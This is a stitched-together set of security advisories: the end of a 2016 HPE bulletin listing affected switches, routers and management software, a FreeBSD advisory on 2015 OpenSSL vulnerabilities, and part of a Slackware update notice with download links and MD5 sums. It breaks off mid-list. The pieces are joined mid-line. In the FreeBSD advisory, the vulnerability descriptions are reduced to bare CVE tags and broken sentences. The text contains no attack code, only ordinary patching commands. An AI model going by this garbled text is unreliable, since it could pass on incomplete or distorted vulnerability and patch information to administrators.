HP 6600 MCP-X2 Router TAA-compliant Main Processing Unit\n  + **HSR6800 RU (Comware 5 Low Encryption SW) - Version: R3303P23-RU**\n    * HP Network Products\n      - JG361A HP HSR6802 Router Chassis\n      - JG361B HP HSR6802 Router Chassis\n      - JG362A HP HSR6804 Router Chassis\n      - JG362B HP HSR6804 Router Chassis\n      - JG363A HP HSR6808 Router Chassis\n      - JG363B HP HSR6808 Router Chassis\n      - JG364A HP HSR6800 RSE-X2 Router Main Processing Unit\n      - JG779A HP HSR6800 RSE-X2 Router TAA-compliant Main Processing Unit\n  + **SMB1910 (Comware 5) - Version: R1111**\n    * HP Network Products\n      - JG540A HP 1910-48 Switch\n      - JG539A HP 1910-24-PoE+ Switch\n      - JG538A HP 1910-24 Switch\n      - JG537A HP 1910-8 -PoE+ Switch\n      - JG536A HP 1910-8 Switch\n  + **SMB1920 (Comware 5) - Version: R1109**\n    * HP Network Products\n      - JG928A HP 1920-48G-PoE+ (370W) Switch\n      - JG927A HP 1920-48G Switch\n      - JG926A HP 1920-24G-PoE+ (370W) Switch\n      - JG925A HP 1920-24G-PoE+ (180W) Switch\n      - JG924A HP 1920-24G Switch\n      - JG923A HP 1920-16G Switch\n      - JG922A HP 1920-8G-PoE+ (180W) Switch\n      - JG921A HP 1920-8G-PoE+ (65W) Switch\n      - JG920A HP 1920-8G Switch\n  + **V1910 (Comware 5) - Version: R1516**\n    * HP Network Products\n      - JE005A HP 1910-16G Switch\n      - JE006A HP 1910-24G Switch\n      - JE007A HP 1910-24G-PoE (365W) Switch\n      - JE008A HP 1910-24G-PoE(170W) Switch\n      - JE009A HP 1910-48G Switch\n      - JG348A HP 1910-8G Switch\n      - JG349A HP 1910-8G-PoE+ (65W) Switch\n      - JG350A HP 1910-8G-PoE+ (180W) Switch\n  + **SMB 1620 (Comware 5) - Version: R1108**\n    * HP Network Products\n      - JG914A HP 1620-48G Switch\n      - JG913A HP 1620-24G Switch\n      - JG912A HP 1620-8G Switch\n\n**COMWARE 7 Products**\n\n  + **12500 (Comware 7) - Version: R7376**\n    * HP Network Products\n      - JC072B HP 12500 Main Processing Unit\n      - JC085A HP A12518 Switch Chassis\n      - JC086A HP A12508 Switch Chassis\n      - JC652A HP 12508 DC Switch Chassis\n      - JC653A HP 12518 DC Switch Chassis\n      - JC654A HP 12504 AC Switch Chassis\n      - JC655A HP 12504 DC Switch Chassis\n      - JF430A HP A12518 Switch Chassis\n      - JF430B HP 12518 Switch Chassis\n      - JF430C HP 12518 AC Switch Chassis\n      - JF431A HP A12508 Switch Chassis\n      - JF431B HP 12508 Switch Chassis\n      - JF431C HP 12508 AC Switch Chassis\n      - JG497A HP 12500 MPU w/Comware V7 OS\n      - JG782A HP FF 12508E AC Switch Chassis\n      - JG783A HP FF 12508E DC Switch Chassis\n      - JG784A HP FF 12518E AC Switch Chassis\n      - JG785A HP FF 12518E DC Switch Chassis\n      - JG802A HP FF 12500E MPU\n  + **10500 (Comware 7) - Version: R7170**\n    * HP Network Products\n      - JC611A HP 10508-V Switch Chassis\n      - JC612A HP 10508 Switch Chassis\n      - JC613A HP 10504 Switch Chassis\n      - JC748A HP 10512 Switch Chassis\n      - JG608A HP FlexFabric 11908-V Switch Chassis\n      - JG609A HP FlexFabric 11900 Main Processing Unit\n      - JG820A HP 10504 TAA Switch Chassis\n      - JG821A HP 10508 TAA Switch Chassis\n      - JG822A HP 10508-V TAA Switch Chassis\n      - JG823A HP 10512 TAA Switch Chassis\n      - JG496A HP 10500 Type A MPU w/Comware v7 OS\n      - JH198A HP 10500 Type D Main Processing Unit with Comware v7 Operating\nSystem\n      - JH206A HP 10500 Type D TAA-compliant with Comware v7 Operating System\nMain Processing Unit\n  + **12900 (Comware 7) - Version: R1138P01**\n    * HP Network Products\n      - JG619A HP FlexFabric 12910 Switch AC Chassis\n      - JG621A HP FlexFabric 12910 Main Processing Unit\n      - JG632A HP FlexFabric 12916 Switch AC Chassis\n      - JG634A HP FlexFabric 12916 Main Processing Unit\n      - JH104A HP FlexFabric 12900E Main Processing Unit\n      - JH114A HP FlexFabric 12910 TAA-compliant Main Processing Unit\n      - JH263A HP FlexFabric 12904E Main Processing Unit\n      - JH255A HP FlexFabric 12908E Switch Chassis\n      - JH262A HP FlexFabric 12904E Switch Chassis\n      - JH113A HP FlexFabric 12910 TAA-compliant Switch AC Chassis\n      - JH103A HP FlexFabric 12916E Switch Chassis\n  + **5900 (Comware 7) - Version: R2422P01**\n    * HP Network Products\n      - JC772A HP 5900AF-48XG-4QSFP+ Switch\n      - JG296A HP 5920AF-24XG Switch\n      - JG336A HP 5900AF-48XGT-4QSFP+ Switch\n      - JG510A HP 5900AF-48G-4XG-2QSFP+ Switch\n      - JG554A HP 5900AF-48XG-4QSFP+ TAA Switch\n      - JG555A HP 5920AF-24XG TAA Switch\n      - JG838A HP FF 5900CP-48XG-4QSFP+ Switch\n      - JH036A HP FlexFabric 5900CP 48XG 4QSFP+ TAA-Compliant\n      - JH037A HP 5900AF 48XGT 4QSFP+ TAA-Compliant Switch\n      - JH038A HP 5900AF 48G 4XG 2QSFP+ TAA-Compliant\n  + **MSR1000 (Comware 7) - Version: R0305P04**\n    * HP Network Products\n      - JG875A HP MSR1002-4 AC Router\n      - JH060A HP MSR1003-8S AC Router\n  + **MSR2000 (Comware 7) - Version: R0305P04**\n    * HP Network Products\n      - JG411A HP MSR2003 AC Router\n      - JG734A HP MSR2004-24 AC Router\n      - JG735A HP MSR2004-48 Router\n      - JG866A HP MSR2003 TAA-compliant AC Router\n  + **MSR3000 (Comware 7) - Version: R0305P04**\n    * HP Network Products\n      - JG404A HP MSR3064 Router\n      - JG405A HP MSR3044 Router\n      - JG406A HP MSR3024 AC Router\n      - JG407A HP MSR3024 DC Router\n      - JG408A HP MSR3024 PoE Router\n      - JG409A HP MSR3012 AC Router\n      - JG410A HP MSR3012 DC Router\n      - JG861A HP MSR3024 TAA-compliant AC Router\n  + **MSR4000 (Comware 7) - Version: R0305P04**\n    * HP Network Products\n      - JG402A HP MSR4080 Router Chassis\n      - JG403A HP MSR4060 Router Chassis\n      - JG412A HP MSR4000 MPU-100 Main Processing Unit\n      - JG869A HP MSR4000 TAA-compliant MPU-100 Main Processing Unit\n  + **VSR (Comware 7) - Version: E0321P01**\n    * HP Network Products\n      - JG810AAE HP VSR1001 Virtual Services Router 60 Day Evaluation\nSoftware\n      - JG811AAE HP VSR1001 Comware 7 Virtual Services Router\n      - JG812AAE HP VSR1004 Comware 7 Virtual Services Router\n      - JG813AAE HP VSR1008 Comware 7 Virtual Services Router\n  + **7900 (Comware 7) - Version: R2138P01**\n    * HP Network Products\n      - JG682A HP FlexFabric 7904 Switch Chassis\n      - JG841A HP FlexFabric 7910 Switch Chassis\n      - JG842A HP FlexFabric 7910 7.2Tbps Fabric / Main Processing Unit\n      - JH001A HP FlexFabric 7910 2.4Tbps Fabric / Main Processing Unit\n      - JH122A HP FlexFabric 7904 TAA-compliant Switch Chassis\n      - JH123A HP FlexFabric 7910 TAA-compliant Switch Chassis\n      - JH124A HP FlexFabric 7910 7.2Tbps TAA-compliant Fabric/Main\nProcessing Unit\n      - JH125A HP FlexFabric 7910 2.4Tbps TAA-compliant Fabric/Main\nProcessing Unit\n  + **5130 (Comware 7) - Version: R3109P16**\n    * HP Network Products\n      - JG932A HP 5130-24G-4SFP+ EI Switch\n      - JG933A HP 5130-24G-SFP-4SFP+ EI Switch\n      - JG934A HP 5130-48G-4SFP+ EI Switch\n      - JG936A HP 5130-24G-PoE+-4SFP+ (370W) EI Switch\n      - JG937A HP 5130-48G-PoE+-4SFP+ (370W) EI Switch\n      - JG938A HP 5130-24G-2SFP+-2XGT EI Switch\n      - JG939A HP 5130-48G-2SFP+-2XGT EI Switch\n      - JG940A HP 5130-24G-PoE+-2SFP+-2XGT (370W) EI Switch\n      - JG941A HP 5130-48G-PoE+-2SFP+-2XGT (370W) EI Switch\n      - JG975A HP 5130-24G-4SFP+ EI Brazil Switch\n      - JG976A HP 5130-48G-4SFP+ EI Brazil Switch\n      - JG977A HP 5130-24G-PoE+-4SFP+ (370W) EI Brazil Switch\n      - JG978A HP 5130-48G-PoE+-4SFP+ (370W) EI Brazil Switch\n  + **5700 (Comware 7) - Version: R2422P01**\n    * HP Network Products\n      - JG894A HP FlexFabric 5700-48G-4XG-2QSFP+ Switch\n      - JG895A HP FlexFabric 5700-48G-4XG-2QSFP+ TAA-compliant Switch\n      - JG896A HP FlexFabric 5700-40XG-2QSFP+ Switch\n      - JG897A HP FlexFabric 5700-40XG-2QSFP+ TAA-compliant Switch\n      - JG898A HP FlexFabric 5700-32XGT-8XG-2QSFP+ Switch\n      - JG899A HP FlexFabric 5700-32XGT-8XG-2QSFP+ TAA-compliant Switch\n  + **5930 (Comware 7) - Version: R2422P01**\n    * HP Network Products\n      - JG726A HP FlexFabric 5930 32QSFP+ Switch\n      - JG727A HP FlexFabric 5930 32QSFP+ TAA-compliant Switch\n      - JH178A HP FlexFabric 5930 2QSFP+ 2-slot Switch\n      - JH179A HP FlexFabric 5930 4-slot Switch\n      - JH187A HP FlexFabric 5930 2QSFP+ 2-slot TAA-compliant Switch\n      - JH188A HP FlexFabric 5930 4-slot TAA-compliant Switch\n  + **HSR6600 (Comware 7) - Version: R7103P05**\n    * HP Network Products\n      - JG353A HP HSR6602-G Router\n      - JG354A HP HSR6602-XG Router\n      - JG776A HP HSR6602-G TAA-compliant Router\n      - JG777A HP HSR6602-XG TAA-compliant Router\n  + **HSR6800 (Comware 7) - Version: R7103P05**\n    * HP Network Products\n      - JG361A HP HSR6802 Router Chassis\n      - JG361B HP HSR6802 Router Chassis\n      - JG362A HP HSR6804 Router Chassis\n      - JG362B HP HSR6804 Router Chassis\n      - JG363A HP HSR6808 Router Chassis\n      - JG363B HP HSR6808 Router Chassis\n      - JG364A HP HSR6800 RSE-X2 Router Main Processing Unit\n      - JG779A HP HSR6800 RSE-X2 Router TAA-compliant Main Processing\n      - JH075A HP HSR6800 RSE-X3 Router Main Processing Unit\n  + **1950 (Comware 7) - Version: R3109P16**\n    * HP Network Products\n      - JG960A HP 1950-24G-4XG Switch\n      - JG961A HP 1950-48G-2SFP+-2XGT Switch\n      - JG962A HP 1950-24G-2SFP+-2XGT-PoE+(370W) Switch\n      - JG963A HP 1950-48G-2SFP+-2XGT-PoE+(370W) Switch\n  + **7500 (Comware 7) - Version: R7170**\n    * HP Network Products\n      - JD238C HP 7510 Switch Chassis\n      - JD239C HP 7506 Switch Chassis\n      - JD240C HP 7503 Switch Chassis\n      - JD242C HP 7502 Switch Chassis\n      - JH207A HP 7500 1.2Tbps Fabric with 2-port 40GbE QSFP+ for IRF-Only\nMain Processing Unit\n      - JH208A HP 7502 Main Processing Unit\n      - JH209A HP 7500 2.4Tbps Fabric with 8-port 1/10GbE SFP+ and 2-port\n40GbE QSFP+ Main Processing Unit\n\n**iMC Products**\n\n  + **iMC Plat - Version: iMC Plat 7.1 E0303P16**\n    * HP Network Products\n      - JD125A  HP IMC Std S/W Platform w/100-node\n      - JD126A  HP IMC Ent S/W Platform w/100-node\n      - JD808A  HP IMC Ent Platform w/100-node License\n      - JD814A   HP A-IMC Enterprise Edition Software DVD Media\n      - JD815A  HP IMC Std Platform w/100-node License\n      - JD816A  HP A-IMC Standard Edition Software DVD Media\n      - JF288AAE  HP Network Director to Intelligent Management Center\nUpgrade E-LTU\n      - JF289AAE  HP Enterprise Management System to Intelligent Management\nCenter Upgrade E-LTU\n      - JF377A  HP IMC Std S/W Platform w/100-node Lic\n      - JF377AAE  HP IMC Std S/W Pltfrm w/100-node E-LTU\n      - JF378A  HP IMC Ent S/W Platform w/200-node Lic\n      - JF378AAE  HP IMC Ent S/W Pltfrm w/200-node E-LTU\n      - JG546AAE  HP IMC Basic SW Platform w/50-node E-LTU\n      - JG548AAE  HP PCM+ to IMC Bsc Upgr w/50-node E-LTU\n      - JG549AAE  HP PCM+ to IMC Std Upgr w/200-node E-LTU\n      - JG550AAE  HP PMM to IMC Bsc WLM Upgr w/150AP E-LTU\n      - JG590AAE  HP IMC Bsc WLAN Mgr SW Pltfm 50 AP E-LTU\n      - JG659AAE  HP IMC Smart Connect VAE E-LTU\n      - JG660AAE  HP IMC Smart Connect w/WLM VAE E-LTU\n      - JG747AAE  HP IMC Std SW Plat w/ 50 Nodes E-LTU\n      - JG748AAE  HP IMC Ent SW Plat w/ 50 Nodes E-LTU\n      - JG766AAE  HP IMC SmCnct Vrtl Applnc SW E-LTU\n      - JG767AAE  HP IMC SmCnct WSM Vrtl Applnc SW E-LTU\n      - JG768AAE  HP PCM+ to IMC Std Upg w/ 200-node E-LTU\n  + **iMC iNode - Version: iNode PC 7.1 E0313, or, iNode PC 7.2 (E0401)**\n    * HP Network Products\n      - JD144A HP A-IMC User Access Management Software Module with 200-user\nLicense\n      - JD147A HP IMC Endpoint Admission Defense Software Module with\n200-user License\n      - JD435A HP A-IMC Endpoint Admission Defense Client Software\n      - JF388A HP IMC User Authentication Management Software Module with\n200-user License\n      - JF388AAE HP IMC User Authentication Management Software Module with\n200-user E-LTU\n      - JF391A HP IMC Endpoint Admission Defense Software Module with\n200-user License\n      - JF391AAE HP IMC Endpoint Admission Defense Software Module with\n200-user E-LTU\n      - JG752AAE HP IMC User Access Manager Software Module with 50-user\nE-LTU\n      - JG754AAE) HP IMC Endpoint Admission Defense Software Module with\n50-user E-LTU\n  + **iMC TAM_UAM - Version: iMC UAM_TAM 7.1 (E0307)**\n    * HP Network Products\n      - JF388A HP IMC UAM S/W MODULE W/200-USER LICENSE\n      - JF388AAE HP IMC UAM S/W MODULE W/200-USER E-LTU\n      - JG752AAE HP IMC UAM SW MOD W/ 50-USER E-LTU\n      - JG483A HP IMC TAM S/W MODULE W/100-NODE LIC\n      - JG483AAE HP IMC TAM S/W MODULE W/100-NODE E-LTU\n      - JG764AAE HP IMC TAM SW MOD W/ 50-NODE E-LTU\n  + **iMC NSM - Version: iMC WSM 7.1 E0303P10**\n    * HP Network Products\n      - JD456A HP IMC WSM Software Module with 50-Access Point License\n      - JF414A HP IMC Wireless Service Manager Software Module with 50-Access\nPoint License\n      - JF414AAE HP IMC Wireless Service Manager Software Module with\n50-Access Point E-LTU\n      - JG551AAE HP PCM+ Mobility Manager to IMC Wireless Service Manager\nModule Upgrade with 250 Access Point E-LTU\n      - JG758AAE HP IMC WSM/RTLS w/ 50-node E-LTU\n      - JG769AAE HP PCM Mobility Manager to IMC Wireless Service Manager Upg\nwith 250-node E-LTU\n\n**VCX Products**\n\n  + **VCX - Version: 9.8.18**\n    * HP Network Products\n      - J9672A HP VCX V7205 Platform w/ DL360 G7 Srvr\n      - J9668A HP VCX IPC V7005 Pltfrm w/ DL120 G6 Srvr\n      - JC517A HP VCX V7205 Platform w/DL 360 G6 Server\n      -  JE355A HP VCX V6000 Branch Platform 9.0\n      - JC516A HP VCX V7005 Platform w/DL 120 G6 Server\n      - JC518A HP VCX Connect 200 Primry 120 G6 Server\n      - J9669A HP VCX IPC V7310 Pltfrm w/ DL360 G7 Srvr\n      - JE341A HP VCX Connect 100 Secondary\n      - JE252A HP VCX Connect Primary MIM Module\n      - JE253A HP VCX Connect Secondary MIM Module\n      - JE254A HP VCX Branch MIM Module\n      - JE355A HP VCX V6000 Branch Platform 9.0\n      - JD028A HP MS30-40 RTR w/VCX + T1/FXO/FXS/Mod\n      - JD023A HP MSR30-40 Router with VCX MIM Module\n      - JD024A HP MSR30-16 RTR w/VCX Ent Br Com MIM\n      - JD025A HP MSR30-16 RTR w/VCX + 4FXO/2FXS Mod\n      - JD026A HP MSR30-16 RTR w/VCX + 8FXO/4FXS Mod\n      - JD027A HP MSR30-16 RTR w/VCX + 8BRI/4FXS Mod\n      - JD029A HP MSR30-16 RTR w/VCX + E1/4BRI/4FXS\n      - JE340A HP VCX Connect 100 Pri Server 9.0\n      - JE342A HP VCX Connect 100 Sec Server 9.0\n\nHISTORY\nVersion:1 (rev.1) - 5 July 2016 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running Hewlett Packard Enterprise (HPE) software\nproducts should be applied in accordance with the customer\u0027s patch management\npolicy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HPE Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hpe.com. \n\nReport: To report a potential security vulnerability with any HPE supported\nproduct, send Email to: security-alert@hpe.com\n\nSubscribe: To initiate a subscription to receive future HPE Security Bulletin\nalerts via Email: http://www.hpe.com/support/Subscriber_Choice\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here: http://www.hpe.com/support/Security_Bulletin_Archive\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HPE General Software\nHF = HPE Hardware and Firmware\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPV = ProCurve\nST = Storage Software\nUX = HP-UX\n\nCopyright 2016 Hewlett Packard Enterprise\n\nHewlett Packard Enterprise shall not be liable for technical or editorial\nerrors or omissions contained herein. The information provided is provided\n\"as is\" without warranty of any kind. To the extent permitted by law, neither\nHP or its affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. Hewlett\nPackard Enterprise and the names of Hewlett Packard Enterprise products\nreferenced herein are trademarks of Hewlett Packard Enterprise in the United\nStates and other countries. Other product and company names mentioned herein\nmay be trademarks of their respective owners. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\n=============================================================================\nFreeBSD-SA-15:10.openssl                                    Security Advisory\n                                                          The FreeBSD Project\n\nTopic:          Multiple OpenSSL vulnerabilities\n\nCategory:       contrib\nModule:         openssl\nAnnounced:      2015-06-12\nAffects:        All supported versions of FreeBSD. \nCorrected:      2015-06-11 19:07:45 UTC (stable/10, 10.1-STABLE)\n                2015-06-12 07:23:55 UTC (releng/10.1, 10.1-RELEASE-p12)\n                2015-06-11 19:39:27 UTC (stable/9, 9.3-STABLE)\n                2015-06-12 07:23:55 UTC (releng/9.3, 9.3-RELEASE-p16)\n                2015-06-11 19:39:27 UTC (stable/8, 8.4-STABLE)\n                2015-06-12 07:23:55 UTC (releng/8.4, 8.4-RELEASE-p30)\nCVE Name:       CVE-2015-1788, CVE-2015-1789, CVE-2015-1790, CVE-2015-1791\n                CVE-2015-1792, CVE-2015-4000\n\nFor general information regarding FreeBSD Security Advisories,\nincluding descriptions of the fields above, security branches, and the\nfollowing sections, please visit \u003cURL:https://security.FreeBSD.org/\u003e. \n\nI.   Background\n\nFreeBSD includes software from the OpenSSL Project.  The OpenSSL Project is\na collaborative effort to develop a robust, commercial-grade, full-featured\nOpen Source toolkit implementing the Secure Sockets Layer (SSL v2/v3)\nand Transport Layer Security (TLS v1) protocols as well as a full-strength\ngeneral purpose cryptography library. \n\nII. [CVE-2015-1791]\n\nThe OpenSSL advisory also describes a problem that is identified as\nCVE-2014-8176, which is already fixed by an earlier FreeBSD Errata\nNotice, FreeBSD-EN-15:02.openssl. \n\nIII. [CVE-2015-4000]. \n[CVE-2015-1788].  This affects FreeBSD 10.1 only, as the problem\nwas no longer exist in OpenSSL 0.9.8 series since July 2012. [CVE-2015-1790]. [CVE-2015-1792]\n\nAn attacker may be able to crash multi-thread applications that\nsupports resumed TLS handshakes. [CVE-2015-1791]\n\nIV.  Workaround\n\nNo workaround is available. \n\nV.   Solution\n\nPerform one of the following:\n\n1) Upgrade your vulnerable system to a supported FreeBSD stable or\nrelease / security branch (releng) dated after the correction date. \n\n2) To update your vulnerable system via a binary patch:\n\nSystems running a RELEASE version of FreeBSD on the i386 or amd64\nplatforms can be updated via the freebsd-update(8) utility:\n\n# freebsd-update fetch\n# freebsd-update install\n\n3) To update your vulnerable system via a source code patch:\n\nThe following patches have been verified to apply to the applicable\nFreeBSD release branches. \n\na) Download the relevant patch from the location below, and verify the\ndetached PGP signature using your PGP utility. \n\n[FreeBSD 10.1]\n# fetch https://security.FreeBSD.org/patches/SA-15:10/openssl-10.1.patch\n# fetch https://security.FreeBSD.org/patches/SA-15:10/openssl-10.1.patch.asc\n# gpg --verify openssl-10.1.patch.asc\n\n[FreeBSD 9.3 and 8.4]\n# fetch https://security.FreeBSD.org/patches/SA-15:10/openssl-8.4.patch\n# fetch https://security.FreeBSD.org/patches/SA-15:10/openssl-8.4.patch.asc\n# gpg --verify openssl-8.4.patch.asc\n\nb) Apply the patch.  Execute the following commands as root:\n\n# cd /usr/src\n# patch \u003c /path/to/patch\n\nc) Recompile the operating system using buildworld and installworld as\ndescribed in \u003cURL:https://www.FreeBSD.org/handbook/makeworld.html\u003e. \n\nRestart all deamons using the library, or reboot the system. \n\nVI.  Correction details\n\nThe following list contains the correction revision numbers for each\naffected branch. \n\nBranch/path                                                      Revision\n- -------------------------------------------------------------------------\nstable/8/                                                         r284286\nreleng/8.4/                                                       r284295\nstable/9/                                                         r284286\nreleng/9.3/                                                       r284295\nstable/10/                                                        r284285\nreleng/10.1/                                                      r284295\n- -------------------------------------------------------------------------\n\nTo see which files were modified by a particular revision, run the\nfollowing command, replacing NNNNNN with the revision number, on a\nmachine with Subversion installed:\n\n# svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base\n\nOr visit the following URL, replacing NNNNNN with the revision number:\n\n\u003cURL:https://svnweb.freebsd.org/base?view=revision\u0026revision=NNNNNN\u003e\n\nVII. References\n\n\u003cURL:https://www.openssl.org/news/secadv_20150611.txt\u003e\n\n\u003cURL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1788\u003e \n\n\u003cURL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1789\u003e\n\n\u003cURL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1790\u003e\n\n\u003cURL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1791\u003e\n\n\u003cURL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1792\u003e\n\n\u003cURL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4000\u003e\n\nThe latest revision of this advisory is available at\n\u003cURL:https://security.FreeBSD.org/advisories/FreeBSD-SA-15:10.openssl.asc\u003e\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v2.1.4 (FreeBSD)\n\niQIcBAEBCgAGBQJVeopGAAoJEO1n7NZdz2rnzhQP/Ak6el188Y+7QbEYVfCZ7eG8\nBQLj5TMGHV5swSKVlPcEuBlMwTjpgB5Gqhc8luDS0eIAuJGdcMPSrZDdXxWQFtPf\npbfIwp/ElFc7d6ut0Y8t6fFLJbhTOoHJpzTGkFRfJkjinGOx7OZQPeLJsxSubbnL\nJKugZ3diH6yk6IPMf9SvhO/kYXUF1VbXQvHNTnqgdhFVkgF6tK22Pkl2XoJ9EHbh\nvBXft1yJwiYlZ//DxZuScTUj1pHYzK3bOpg//REJMWCMj1RVwQr2EyDa0Q2cT02d\neRnSZykXD69eybyzEck+BvwnUYYJICimnHuE5t78UIr0D/NWyOAZTQ99z5TID5aV\nHXkcil+1E/Q+xBB4+5UOOnESf6cmiWwewQOVvD26ZY39E6oJXvsrWnyxIuCG6DL9\nsLtxB6iTYlTX5Civ/VJX8H7rFiw4UwMembthvGzck22026iHjplWM3GCWz0E8O3R\nPrXBHjAzNFawK3owNMxFSUFTuFw/qY7EEwJ3SKCEC+hoxcLOl26NMxrQKRIAUk+I\nMMOaZfvOh2uM19y9SJZz8+sqU8gIm7ihDm5fuSkO8kY0jdvLwyS9bXAejN/lZ6oJ\nTyfTDDyXDOdaPpnpQehh6vQV0NiaJ+WXfGhfiE8/G/t6b1E0LlCaaGJTpYkildGe\nvVCM4Nyx4S9WDFOi76ug\n=dyhg\n-----END PGP SIGNATURE-----\n. \n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n+--------------------------+\npatches/packages/openssl-1.0.1n-i486-1_slack14.1.txz:  Upgraded. \n  Fixes several bugs and security issues:\n   o Malformed ECParameters causes infinite loop (CVE-2015-1788)\n   o Exploitable out-of-bounds read in X509_cmp_time (CVE-2015-1789)\n   o PKCS7 crash with missing EnvelopedContent (CVE-2015-1790)\n   o CMS verify infinite loop with unknown hash function (CVE-2015-1792)\n   o Race condition handling NewSessionTicket (CVE-2015-1791)\n  For more information, see:\n    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1788\n    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1789\n    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1790\n    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1792\n    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1791\n  (* Security fix *)\npatches/packages/openssl-solibs-1.0.1n-i486-1_slack14.1.txz:  Upgraded. \n+--------------------------+\n\n\nWhere to find the new packages:\n+-----------------------------+\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project!  :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you. \n\nUpdated packages for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssl-0.9.8zg-i486-1_slack13.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssl-solibs-0.9.8zg-i486-1_slack13.0.txz\n\nUpdated packages for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssl-0.9.8zg-x86_64-1_slack13.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssl-solibs-0.9.8zg-x86_64-1_slack13.0.txz\n\nUpdated packages for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssl-0.9.8zg-i486-1_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssl-solibs-0.9.8zg-i486-1_slack13.1.txz\n\nUpdated packages for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssl-0.9.8zg-x86_64-1_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssl-solibs-0.9.8zg-x86_64-1_slack13.1.txz\n\nUpdated packages for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssl-0.9.8zg-i486-1_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssl-solibs-0.9.8zg-i486-1_slack13.37.txz\n\nUpdated packages for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssl-0.9.8zg-x86_64-1_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssl-solibs-0.9.8zg-x86_64-1_slack13.37.txz\n\nUpdated packages for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-1.0.1n-i486-1_slack14.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-solibs-1.0.1n-i486-1_slack14.0.txz\n\nUpdated packages for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-1.0.1n-x86_64-1_slack14.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-solibs-1.0.1n-x86_64-1_slack14.0.txz\n\nUpdated packages for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-1.0.1n-i486-1_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-solibs-1.0.1n-i486-1_slack14.1.txz\n\nUpdated packages for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-1.0.1n-x86_64-1_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-solibs-1.0.1n-x86_64-1_slack14.1.txz\n\nUpdated packages for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/openssl-solibs-1.0.1n-i586-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/openssl-1.0.1n-i586-1.txz\n\nUpdated packages for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/openssl-solibs-1.0.1n-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/openssl-1.0.1n-x86_64-1.txz\n\n\nMD5 signatures:\n+-------------+\n\nSlackware 13.0 packages:\n383ecfed6bfef1440a44d7082745848a  openssl-0.9.8zg-i486-1_slack13.0.txz\nfb186187ffa200e22d9450a9d0e321f6  openssl-solibs-0.9.8zg-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 packages:\neb52318ed52fef726402f0b2a74745c5  openssl-0.9.8zg-x86_64-1_slack13.0.txz\n9447927b960a01b21149e28a9783021f  openssl-solibs-0.9.8zg-x86_64-1_slack13.0.txz\n\nSlackware 13.1 packages:\n37f46f6b4fe2acbe217eaf7c0b33b704  openssl-0.9.8zg-i486-1_slack13.1.txz\n986de2e71676f61d788a59a1e0c8de1f  openssl-solibs-0.9.8zg-i486-1_slack13.1.txz\n\nSlackware x86_64 13.1 packages:\n6b160ce817dcde3ae5b3a861b284387b  openssl-0.9.8zg-x86_64-1_slack13.1.txz\n503d891680c711162386ea7e3daadca8  